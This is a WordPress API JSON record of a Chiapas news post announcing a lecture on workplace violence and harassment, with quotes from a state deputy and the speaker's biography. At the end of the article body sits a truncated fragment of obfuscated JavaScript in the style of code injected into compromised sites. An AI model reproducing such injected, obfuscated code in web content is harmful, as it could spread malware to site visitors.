{"id":4694,"date":"2022-08-25T23:42:30","date_gmt":"2022-08-25T23:42:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4694"},"modified":"2022-08-25T23:42:31","modified_gmt":"2022-08-25T23:42:31","slug":"sgg-y-la-comision-editorial-y-de-relaciones-publicas-del-h-congreso-del-estado-anuncian-conferencia-magistral-violencia-y-acoso-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4694","title":{"rendered":"SGG y la Comisi\u00f3n Editorial y de Relaciones P\u00fablicas del H. Congreso del Estado anuncian conferencia magistral \u201cViolencia y Acoso Laboral\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020-1024x680.jpg\" alt=\"\" class=\"wp-image-4695\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020-1024x680.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020-768x510.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220825-WA0020.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 25 agosto de 2022.- La Secretar\u00eda General de Gobierno del Estado de Chiapas que dirige Victoria Cecilia Flores P\u00e9rez en coordinaci\u00f3n con el H. Congreso del Estado a trav\u00e9s de la Comisi\u00f3n Editorial y de Relaciones P\u00fablicas, que preside la diputada Roc\u00edo Cervantes Cancino, organizar\u00e1n la conferencia magistral \u201cViolencia y Acoso Laboral\u201d que ser\u00e1 impartido por la Magistrada presidenta de la Comisi\u00f3n de Igualdad y Derechos Humanos del Tribunal Federal de Conciliaci\u00f3n y Arbitraje, M\u00f3nica Arcelia G\u00fcicho Gonz\u00e1lez.La conferencia tiene como finalidad brindar informaci\u00f3n relevante en materia de g\u00e9nero a autoridades de los tres \u00f3rdenes de gobierno, c\u00e1maras empresariales, colegios profesionales y p\u00fablico en general, priorizando de primera mano a mujeres. Se impartir\u00e1 el pr\u00f3ximo mi\u00e9rcoles 31 de agosto.\u201cEs necesario que las mujeres tomen conciencia de sus derechos, porque constantemente vivimos siendo acosadas y violentadas en todos los \u00e1mbitos, y m\u00e1s precisamente, en nuestros espacios de trabajo\u201d, se\u00f1al\u00f3 la diputada Roc\u00edo Cervantes al agradecer a la secretaria de general de gobierno Cecilia Flores por mostrar el inter\u00e9s y sumarse desde primer momento a esta magistral conferencia. \u201cEsto es un trabajo en conjunto, y debemos realizar constantemente para erradicar cualquier tipo de violencia\u201d puntualiz\u00f3 la legisladora Cervantes.M\u00f3nica G\u00fcicho es originaria de Culiac\u00e1n Sinaloa, egresada de la Escuela Libre de Derecho de Sinaloa, donde obtuvo t\u00edtulo de licenciatura en Derecho con Menci\u00f3n Honor\u00edfica, adem\u00e1s ha sido impulsora para juzgar con Perspectiva de G\u00e9nero en el \u00d3rgano Jurisdiccional Burocr\u00e1tico desde su incorporaci\u00f3n, tambi\u00e9n ha participado por dos periodos distintos como Titular del Apartado IX en la Asociaci\u00f3n Mexicana de Impartidores de Justicia (AMIJ) ante el Comit\u00e9 Interinstitucional de Igualdad de G\u00e9nero, del Poder Judicial de la Federaci\u00f3n.\u201cAgradecemos que una persona con una trayectoria tan amplia en materia de g\u00e9nero est\u00e9 dispuesta a concientizar a las mujeres de nuestra ciudad con su experiencia, porque muchas veces no tenemos la informaci\u00f3n precisa de c\u00f3mo debemos actuar ante estas situaciones de violencia\u201d, agreg\u00f3 Roc\u00edo Cervantes.Dijo que con estas conferencias \u201cpodemos generar estrategias que ayuden a protegernos. Tenemos que trabajar en conjunto y con acciones acertadas, no podemos permitir que sigan ocurriendo casos que perjudiquen la participaci\u00f3n femenina en el mundo laboral, familiar y pol\u00edtico\u201d, puntualiz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 25 agosto de 2022.- La Secretar\u00eda General de Gobierno del Estado de Chiapas que dirige Victoria Cecilia Flores P\u00e9rez en coordinaci\u00f3n con el H. Congreso del Estado a trav\u00e9s de la Comisi\u00f3n Editorial y de Relaciones P\u00fablicas, que preside la diputada Roc\u00edo Cervantes Cancino, organizar\u00e1n la conferencia magistral \u201cViolencia y Acoso Laboral\u201d que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4695,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4694","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4694","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4694"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4694\/revisions"}],"predecessor-version":[{"id":4696,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4694\/revisions\/4696"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4695"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4694"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4694"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4694"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}